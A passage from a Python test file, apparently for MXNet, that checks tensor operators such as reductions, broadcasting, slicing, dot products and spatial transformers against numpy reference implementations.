                    b = mx_reduce_sym(a, keepdims=keepdims)
            elif exclude and isinstance(axes, tuple) and len(axes) < ndim:
                # Exercise exclude=True by passing the complement of the axes.
                naxes = [i for i in range(ndim) if i not in axes]
                b = mx_reduce_sym(a, axis=naxes, keepdims=keepdims, exclude=True)
            else:
                b = mx_reduce_sym(a, axis=axes, keepdims=keepdims)
            dat_npy = np.random.rand(*shape)
            # Test with both negative and positive values (randomly). Avoid having both in the same
            # test, which can be problematic for error checking due to near-zero values.
            if np.random.rand() > 0.5:
                dat_npy = -dat_npy
            if nan_prob > 0:
                dat_npy[np.random.rand(*shape) < nan_prob] = np.nan
            sum_groundtruth = np.array(numpy_reduce_func(dat_npy, axis=axes, keepdims=keepdims))
            if sum_groundtruth.shape == ():
                # 0-d result: promote so the comparisons below see a 1-element array.
                sum_groundtruth = np.array([sum_groundtruth])
            grad_nd = mx.nd.empty(shape)
            outgrad_npy = np.array(np.random.rand(*sum_groundtruth.shape))
            # Shape of the reduction result with keepdims=True, used by the
            # reference gradient functions to broadcast the out-grad back.
            keepdim_shape = np_reduce(dat_npy, axes, 1, np.sum).shape
            grad_groundtruth = numpy_reduce_grad_func(outgrad=outgrad_npy, data=dat_npy,
                                                      outdata=sum_groundtruth,
                                                      axis=axes, keepdims=keepdims,
                                                      keepdim_shape=keepdim_shape)
            net = b.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
                         args_grad={'a': grad_nd})
            net.forward(is_train=True)
            # NaNs are ignored in the comparison (relevant for nansum/nanprod).
            equal_forward = almost_equal_ignore_nan(net.outputs[0].asnumpy(), sum_groundtruth, 1E-4, 1E-4)
            assert equal_forward
            net.backward(out_grads=mx.nd.array(outgrad_npy))
            bc_grad_groundtruth = np.broadcast_to(grad_groundtruth, grad_nd.shape)
            equal_backward = almost_equal_ignore_nan(grad_nd.asnumpy(), bc_grad_groundtruth, 1E-4, 1E-4)
            assert equal_backward

    test_none_axis = [True, False]
    for test_none in test_none_axis:
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.sum),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            outgrad.reshape(keepdim_shape),
                          mx.symbol.sum, test_none_axis=test_none)
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.mean),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
                          mx.symbol.mean, test_none_axis=test_none)
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
                          mx.symbol.prod, test_none_axis=test_none)
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
                          mx.symbol.nansum, 0.3, test_none_axis=test_none)
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
                                     (outdata.reshape(keepdim_shape) / data)),
                          mx.symbol.nanprod, 0.3, test_none_axis=test_none)
        # grad of max and min are sensitive to the precision of the calculation.
        # Force numpy to match mxnet's float32.
        # NOTE(review): max/min don't receive test_none_axis, so these two
        # calls run twice (once per iteration of the test_none loop) with
        # identical arguments.
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            outgrad.reshape(keepdim_shape) *
                            (np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
                          mx.symbol.max)
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            outgrad.reshape(keepdim_shape) *
                            (np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
                          mx.symbol.min)
        test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
                          lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
                            outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
                          mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
    """Randomized forward/backward checks for broadcast_axis, broadcast_to
    (including a 0 entry in the target shape) and broadcast_like."""
    sample_num = 200
    for i in range(sample_num):
        # Random target shape with ndim in [1, 5]; the chosen broadcast axes
        # are collapsed to 1 in the source shape.
        ndim = np.random.randint(1, 6)
        target_shape = np.random.randint(1, 6, size=(ndim,))
        axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
        shape = target_shape.copy()
        size = tuple([shape[ele] for ele in axis])
        for ele in axis:
            shape[ele] = 1
        # Replace the first non-broadcast dim with 0 — presumably
        # broadcast_to's "keep the input dim" convention; verify against
        # the operator docs.
        target_shape_with_zero = list(target_shape)
        for idx in range(len(target_shape_with_zero)):
            if idx not in axis:
                target_shape_with_zero[idx] = 0
                break
        a = mx.symbol.Variable('a')
        sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
        sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
        sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
        sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)

        def test_broadcasting_ele(sym_bcast):
            # Forward must replicate the input along the broadcast axes;
            # backward must sum the out-grad over those axes.
            dat_npy = np.random.rand(*shape)
            groundtruth = dat_npy
            grad_nd = mx.nd.empty(shape)
            outgrad_npy = np.random.rand(*target_shape)
            grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
                                         numpy_reduce_func=np.sum)
            net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
                                 args_grad={'a': grad_nd})
            net.forward(is_train=True)
            assert (net.outputs[0].shape == target_shape).all()
            assert_almost_equal(net.outputs[0].asnumpy(), groundtruth, rtol=1e-4)
            net.backward(out_grads=mx.nd.array(outgrad_npy))
            assert_almost_equal(grad_nd.asnumpy(), grad_groundtruth, rtol=1e-4)
        test_broadcasting_ele(sym_bcast_axis)
        test_broadcasting_ele(sym_bcast_to)
        test_broadcasting_ele(sym_bcast_to_with_zero)
        test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
    """Check mx.nd.transpose against np.transpose, with and without an
    explicit axis permutation, over random ranks and shapes."""
    for rank in range(1, 7):
        for _ in range(5):
            shape = list(np.random.randint(1, 10, size=rank))
            perm = list(range(rank))
            random.shuffle(perm)
            perm = tuple(perm)
            data = mx.nd.array(np.random.normal(size=shape))
            ref = data.asnumpy()
            # Explicit permutation.
            transposed = mx.nd.transpose(data, axes=perm)
            assert_allclose(np.transpose(ref, axes=perm), transposed.asnumpy())
            # Default behaviour: reverse all axes.
            transposed = mx.nd.transpose(data)
            assert_allclose(np.transpose(ref), transposed.asnumpy())
@with_seed()
def test_expand_dims():
    """Check mx.nd.expand_dims against np.expand_dims for every valid axis."""
    for rank in range(1, 6):
        for ax in range(-rank + 1, rank):
            npy = np.random.normal(size=list(np.random.randint(1, 10, size=rank)))
            nd = mx.nd.array(npy)
            expected = np.expand_dims(npy, axis=ax)
            actual = mx.nd.expand_dims(nd, axis=ax)
            assert_allclose(expected, actual.asnumpy())
            assert_allclose(expected.shape, actual.shape)
@with_seed()
def test_crop():
    """Randomized checks of mx.nd.crop / mx.sym.crop against numpy slicing."""
    for ndim in range(1, 6):
        for t in range(5):
            dims = []
            begin = []
            end = []
            idx = []
            for i in range(ndim):
                # Pick a non-empty [b, e) range per dim, then randomly rewrite
                # the endpoints as None or negative indices to exercise those
                # forms of the crop arguments.
                d = random.randint(1, 5)
                b = random.randint(0, d-1)
                e = random.randint(b+1, d)
                if b == 0 and random.randint(0, 1):
                    b = None
                elif b != 0 and random.randint(0, 1):
                    b -= d
                if e == d and random.randint(0, 1):
                    e = None
                elif e != d and random.randint(0, 1):
                    e -= d
                dims.append(d)
                begin.append(b)
                end.append(e)
                idx.append(slice(b, e))
            x = mx.nd.array(np.random.normal(size=dims))
            y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
            assert_allclose(x.asnumpy()[idx], y.asnumpy())
            # Also gradient-check the symbolic version on the same region.
            vx = mx.sym.Variable('x')
            vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
            check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
    """slice_axis forward/backward vs numpy slicing, including grad_req='add'."""
    for ndim in range(1, 6):
        shape = np.random.randint(1, 11, size=(ndim,))
        for t in range(ndim):
            # Random [b, e) range on axis t; sometimes expressed with None /
            # negative indices to cover those code paths.
            d = shape[t]
            b = random.randint(0, d-1)
            e = random.randint(b+1, d)
            if np.random.rand() > 0.6:
                e = None
            else:
                if e < d and np.random.rand() > 0.5:
                    e = e - d
                if np.random.rand() > 0.5:
                    b = b - d
            # Equivalent numpy index: full slices everywhere except axis t.
            idx = []
            for i in range(ndim):
                idx.append(slice(0, shape[i]))
            idx[t] = slice(b, e)
            X = mx.symbol.Variable('X')
            x = mx.nd.array(np.random.normal(size=shape))
            Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
            xgrad = mx.nd.empty(x.shape)
            exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
            exec1.forward(is_train=True)
            y = exec1.outputs[0]
            assert_allclose(x.asnumpy()[idx], y.asnumpy())
            # grad_req='write': gradient is the out-grad scattered into the
            # sliced region and zero everywhere else.
            exec1.backward([y])
            xx = x.asnumpy()
            xx[:] = 0.0
            xx[idx] = x.asnumpy()[idx]
            assert_allclose(xx, xgrad.asnumpy())
            # grad_req='add': gradient must accumulate on top of the
            # pre-existing gradient buffer contents.
            x_grad_npy = np.random.normal(size=x.shape)
            xgrad = mx.nd.array(x_grad_npy)
            exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
            exec2.forward(is_train=True)
            exec2.backward([exec2.outputs[0]])
            xx = np.zeros(shape=x.shape, dtype=np.float32)
            xx[idx] = x.asnumpy()[idx]
            assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
    """slice_like: slice `data` down to the shape of a reference input along
    the requested axes; also checks the reference input gets zero gradient."""
    for ndim in range(1, 6):
        # `shape` is `from_shape` enlarged by 0-2 per dim, so slicing down is
        # always possible.
        from_shape = np.random.randint(1, 11, size=(ndim,))
        shape = [s + np.random.randint(0, 3) for s in from_shape]
        for t in range(ndim):
            if t > 0:
                axes = np.random.randint(0, ndim, size=t).tolist()
            else:
                axes = []
            # Expected region: full dims, except the selected axes (or all
            # axes when axes == []) are clipped to the reference shape.
            idx = []
            for i in range(ndim):
                idx.append(slice(0, shape[i]))
                if i in axes or not axes:
                    idx[i] = slice(0, from_shape[i])
            if axes:
                # Turn one axis negative to exercise negative-axis handling.
                pos = np.random.randint(0, t)
                if axes[pos] > 0:
                    axes[pos] -= ndim  # negative index
            X = mx.symbol.Variable('X')
            X_1 = mx.symbol.Variable('X1')
            x = mx.nd.array(np.random.normal(size=shape))
            x1 = mx.nd.array(np.random.normal(size=from_shape))
            Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
            xgrad = mx.nd.empty(x.shape)
            xgrad1 = mx.nd.empty(x1.shape)
            exec1 = Y.bind(default_context(), args = [x, x1],
                           args_grad = {'X': xgrad, 'X1': xgrad1})
            exec1.forward(is_train=True)
            y = exec1.outputs[0]
            assert_allclose(x.asnumpy()[idx], y.asnumpy())
            exec1.backward([y])
            # Gradient of data: out-grad scattered into the sliced region.
            xx = x.asnumpy()
            xx[:] = 0.0
            xx[idx] = x.asnumpy()[idx]
            assert_allclose(xx, xgrad.asnumpy())
            # The shape_like input must receive no gradient.
            assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
    """slice_like must accept a shape reference of a different dtype (int32)."""
    src = mx.nd.array([[ 1.,  2.,  3.,  4.],
                       [ 5.,  6.,  7.,  8.],
                       [ 9., 10., 11., 12.]])
    ref = mx.nd.array([[0., 0., 0.],
                       [0., 0., 0.]]).astype('int32')
    out = mx.nd.slice_like(src, ref)
    assert_allclose(out.asnumpy(), [[1, 2, 3], [5, 6, 7]])
@with_seed()
def test_reshape_like_different_types():
    """reshape_like must accept a shape reference of a different dtype (int32)."""
    src = mx.nd.zeros((2, 3))
    ref = mx.nd.array([[1, 2], [3, 4], [5, 6]]).astype('int32')
    out = mx.nd.reshape_like(src, ref)
    assert_allclose(out.asnumpy(), [[0, 0], [0, 0], [0, 0]])
@with_seed()
def test_flip():
    """Check mx.nd.flip against numpy reverse-slicing along one random axis."""
    for rank in range(1, 6):
        for _ in range(5):
            shape = [random.randint(1, 10) for _ in range(rank)]
            ax = random.randint(0, rank - 1)
            # Reverse only the chosen axis in the numpy reference.
            sel = []
            for d in range(rank):
                sel.append(slice(None, None, -1) if d == ax else slice(None, None))
            data = mx.nd.array(np.random.normal(size=shape))
            flipped = mx.nd.flip(data, axis=ax)
            assert_allclose(data.asnumpy()[sel], flipped.asnumpy())
@with_seed()
def test_stn():
    """SpatialTransformer with a fixed affine transform.

    The localisation network's weights are zeroed, so its output equals
    loc_fc_bias = [0.5, 0, 0, 0, 0.5, 0] — presumably a pure 0.5x scaling in
    both dimensions (verify against the operator docs). The forward output
    must then equal the centre crop of the input, and the backward gradient
    must land entirely in that crop.
    """
    import sys
    np.set_printoptions(threshold=sys.maxsize)
    num_filter = 2  # conv of loc net
    kernel = (3, 3)  # conv of loc net
    num_hidden = 6  # fc of loc net
    for n in [1, 2, 3, 4]:
        for c in [1, 2, 3, 4]:
            for h in [5, 9, 13, 17]:  # for convenience test, this third and fourth input dim should be 4x + 1
                for w in [5, 9, 13, 17]:
                    data_shape = (n, c, h, w)
                    # Output is half the spatial size (rounded up).
                    target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
                    data = mx.sym.Variable(name="data")
                    loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
                    loc = mx.sym.Flatten(data=loc)
                    loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
                    stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
                                                    transform_type="affine", sampler_type="bilinear")
                    arg_names = stn.list_arguments()
                    arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
                    # check shape
                    assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
                    dev = default_context()
                    #dev = mx.gpu(0)
                    # Zero the loc-net conv/fc weights so the predicted
                    # transform is exactly loc_fc_bias.
                    args = {}
                    args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
                    args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
                    args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
                    args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
                    args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
                    grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
                    exe = stn.bind(dev, args=args, args_grad=grad_grad)
                    exe.forward(is_train=True)
                    out = exe.outputs[0].asnumpy()
                    # check forward: output equals the centre crop of the input
                    assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
                    out_grad = mx.nd.ones(out.shape, ctx=dev)
                    exe.backward([out_grad])
                    # check backward: data gradient inside the crop equals the out-grad
                    assert_almost_equal(out_grad.asnumpy(), grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
    """SpatialTransformer with a near-identity affine transform must sample
    strictly in-bounds; forward and backward must run without error."""
    target_shape = (28, 28)
    src_shape = (42, 42)

    data = mx.sym.Variable(name="data")
    loc = mx.sym.Variable(name="loc")

    data_array = np.zeros((1, 1) + src_shape)
    # Have an ever so slight rotation.
    loc_array = np.array(
        [[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
          -0.000919065]])

    stn = mx.sym.SpatialTransformer(
        data=data,
        loc=loc,
        target_shape=target_shape,
        transform_type="affine",
        sampler_type="bilinear")

    grad_req = {arg: 'write' for arg in stn.list_arguments()}
    grads = {
        'data': mx.nd.array(np.zeros_like(data_array)),
        'loc': mx.nd.array(np.zeros_like(loc_array))
    }
    exe = stn.bind(
        ctx=default_context(),
        args={'data': mx.nd.array(data_array),
              'loc': mx.nd.array(loc_array)},
        grad_req=grad_req,
        args_grad=grads)
    exe.forward(is_train=True)
    exe.backward(mx.nd.ones((1, 1) + target_shape))
@with_seed()
def test_dot():
    """mx.sym.dot forward/backward vs numpy, plus numeric-gradient checks of
    every transpose_a/transpose_b combination."""
    ctx = default_context()
    dtypes = ['float32', 'float64']
    ndims = [2]
    if ctx.device_type == 'gpu':
        dtypes += ['float16']
        ndims += [1]
    # Test normal dot.
    for ndim in ndims:
        for data_type in dtypes:
            for m in range(1, 5):
                for k in range(1, 5):
                    if ndim == 1 and k != 1:
                        # NOTE(review): `pass` is a no-op — this looks like it
                        # was meant to be `continue` to skip invalid 1-D
                        # combinations; as written the branch does nothing.
                        pass
                    for n in range(1, 5):
                        # NOTE(review): a_shape/b_shape are computed but never
                        # used below — the bind uses the 2-D (m, k)/(k, n)
                        # arrays regardless, so the ndim==1 path is not
                        # actually exercised.
                        a_shape = (m, k) if ndim == 2 else (m,)
                        b_shape = (k, n) if ndim == 2 else (n,)
                        a_npy = np.random.normal(0, 1, (m, k))
                        a_npy = a_npy.astype(data_type)
                        b_npy = np.random.normal(0, 1, (k, n))
                        b_npy = b_npy.astype(data_type)
                        c_npy = np.empty((m, n), dtype=data_type)
                        ograd_npy = np.random.normal(0, 1, (m, n))
                        ograd_npy = ograd_npy.astype(data_type)
                        agrad_npy = np.empty((m, k), dtype=data_type)
                        bgrad_npy = np.empty((k, n), dtype=data_type)
                        # Reference: C = A.B, dB = A^T.dC, dA = dC.B^T
                        c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
                        bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
                        agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
                        a = mx.sym.Variable('a', dtype=data_type)
                        b = mx.sym.Variable('b', dtype=data_type)
                        c = mx.sym.dot(a, b)
                        exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
                        outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
                        # Looser tolerances for float16.
                        assert_almost_equal(outputs[0].asnumpy(), c_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-3)
                        exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
                        assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-3)
                        assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-3)
    # Test dot with transpose flag using gradient checker.
    def dot_sym(data_type):
        x = mx.sym.Variable('x', dtype=data_type)
        y = mx.sym.Variable('y', dtype=data_type)
        return mx.sym.dot(x, y)
    def dot_sym_xT(data_type):
        x = mx.sym.Variable('x', dtype=data_type)
        y = mx.sym.Variable('y', dtype=data_type)
        return mx.sym.dot(x, y, transpose_a=True)
    def dot_sym_yT(data_type):
        x = mx.sym.Variable('x', dtype=data_type)
        y = mx.sym.Variable('y', dtype=data_type)
        return mx.sym.dot(x, y, transpose_b=True)
    def dot_sym_xT_yT(data_type):
        x = mx.sym.Variable('x', dtype=data_type)
        y = mx.sym.Variable('y', dtype=data_type)
        return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
    for data_type in dtypes:
        for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
            m1_npy = np.random.uniform(-1, 1, ashape)
            m1_npy = m1_npy.astype(data_type)
            m2_npy = np.random.uniform(-1, 1, bshape)
            m2_npy = m2_npy.astype(data_type)
            # Pre-transpose the inputs so every variant sees compatible shapes.
            check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
            check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
            check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
            check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
    """batch_dot forward/backward vs a per-sample np.dot reference.

    Covers random transpose_a/transpose_b combinations and both
    grad_req='write' and grad_req='add' (the latter must accumulate on top of
    a pre-initialized gradient buffer).
    """
    dtypes = ['float32', 'float64']
    if default_context().device_type == 'gpu':
        dtypes += ['float16']
    for data_type in dtypes:
        for batch_size in range(1, 5):
            for m in range(1, 5):
                for k in range(1, 5):
                    for n in range(1, 5):
                        transpose_a = (np.random.rand() > 0.5)
                        transpose_b = (np.random.rand() > 0.5)
                        a_npy = np.random.normal(0, 1, (batch_size, m, k))
                        a_npy = a_npy.astype(data_type)
                        b_npy = np.random.normal(0, 1, (batch_size, k, n))
                        b_npy = b_npy.astype(data_type)
                        c_npy = np.empty((batch_size, m, n), dtype=data_type)
                        ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
                        ograd_npy = ograd_npy.astype(data_type)
                        agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
                        bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
                        # Random initial gradient buffers for the grad_req='add'
                        # check. BUG FIX: these were previously overwritten with
                        # a_npy.astype(...)/b_npy.astype(...), discarding the
                        # freshly drawn random initialization.
                        a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
                        a_init_grad_npy = a_init_grad_npy.astype(data_type)
                        b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
                        b_init_grad_npy = b_init_grad_npy.astype(data_type)
                        for i in range(batch_size):
                            # Reference per sample: C = A.B, dB = A^T.dC, dA = dC.B^T
                            c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
                            bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
                            agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
                        a = mx.sym.Variable('a', dtype=data_type)
                        b = mx.sym.Variable('b', dtype=data_type)
                        c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
                        # Transpose the reference arrays instead of recomputing them.
                        if transpose_a:
                            a_npy = np.transpose(a_npy, axes=(0, 2, 1))
                            agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
                            a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
                        if transpose_b:
                            b_npy = np.transpose(b_npy, axes=(0, 2, 1))
                            bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
                            b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
                        exe = c.simple_bind(ctx=default_context(),
                                            a=a_npy.shape, b=b_npy.shape, grad_req='write')
                        exe_add = c.simple_bind(ctx=default_context(),
                                                a=a_npy.shape, b=b_npy.shape, grad_req='add')
                        exe_add.grad_dict['a'][:] = a_init_grad_npy
                        exe_add.grad_dict['b'][:] = b_init_grad_npy
                        outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
                        # Looser tolerances for float16.
                        assert_almost_equal(outputs[0].asnumpy(), c_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-4)
                        exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
                        assert_almost_equal(exe.grad_dict['a'].asnumpy(), agrad_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-4)
                        assert_almost_equal(exe.grad_dict['b'].asnumpy(), bgrad_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-4)
                        # grad_req='add': result must be reference grad + init buffer.
                        exe_add.forward(is_train=True, a=a_npy, b=b_npy)
                        exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
                        assert_almost_equal(exe_add.grad_dict['a'].asnumpy(),
                                            agrad_npy + a_init_grad_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-4)
                        assert_almost_equal(exe_add.grad_dict['b'].asnumpy(),
                                            bgrad_npy + b_init_grad_npy,
                                            rtol=1e-2 if data_type == 'float16' else 1e-3,
                                            atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
    """Build a Correlation symbol over fresh 'img1'/'img2' variables.

    NOTE(review): data1 and data2 are accepted but never used — the symbol is
    built from new Variables and callers bind the actual arrays later.
    """
    img1 = mx.sym.Variable('img1')
    img2 = mx.sym.Variable('img2')
    return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
                              stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
    """Naive nested-loop numpy reference forward pass for Correlation.

    data1/data2: 4-D NCHW arrays of identical shape. For every output pixel,
    the kernel_size x kernel_size patch at (y1, x1) in data1 is compared
    against displaced patches in data2; is_multiply selects dot-product vs
    absolute-difference matching.

    Returns (out, tmp1, tmp2): the correlation map and the two zero-padded
    inputs (returned so the backward reference can reuse them).
    """
    # compute output's dimension
    paddedbottomheight = data1.shape[2] + 2 * pad_size
    paddedbottomwidth = data1.shape[3] + 2 * pad_size
    kernel_radius = (kernel_size - 1) // 2
    border_size = max_displacement + kernel_radius
    top_width = (paddedbottomwidth - border_size * 2) // stride1
    top_height = (paddedbottomheight - border_size * 2) // stride1
    neighborhood_grid_radius = max_displacement // stride2
    neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
    # one output channel per displacement in the search grid
    top_channels = neighborhood_grid_width * neighborhood_grid_width
    out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
    # zero-pad both inputs
    tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
    tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
    tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
    tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
    for i in range(top_height):
        for j in range(top_width):
            for nbatch in range(data1.shape[0]):
                # x1,y1 is the location in data1 , i,j is the location in output
                x1 = j * stride1 + max_displacement
                y1 = i * stride1 + max_displacement
                for top_channel in range(top_channels):
                    # displacement encoded by the output channel index
                    s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
                    s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
                    # location in data2
                    x2 = x1 + s2o
                    y2 = y1 + s2p
                    for h in range(kernel_size):
                        for w in range(kernel_size):
                            for channel in range(data1.shape[1]):
                                if is_multiply:
                                    out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
                                else:
                                    out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
    # normalize by patch size times channel count
    out /= float(kernel_size**2*data1.shape[1])
    return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
    """Naive numpy reference backward pass for the Correlation operator.

    Args mirror correlation_forward; tmp1/tmp2 are the zero-padded inputs
    returned by the forward reference, out_grad is the gradient w.r.t. the
    correlation map. Returns (grad_data1, grad_data2), cropped back to the
    unpadded input shapes.

    Fix: removed a dead `out = np.zeros(...)` allocation that was never used.
    """
    # Recompute the output geometry from the input shapes (same as forward).
    paddedbottomheight = data1.shape[2] + 2 * pad_size
    paddedbottomwidth = data1.shape[3] + 2 * pad_size
    kernel_radius = (kernel_size - 1) // 2
    border_size = max_displacement + kernel_radius
    top_width = (paddedbottomwidth - border_size * 2) // stride1
    top_height = (paddedbottomheight - border_size * 2) // stride1
    neighborhood_grid_radius = max_displacement // stride2
    neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
    top_channels = neighborhood_grid_width * neighborhood_grid_width
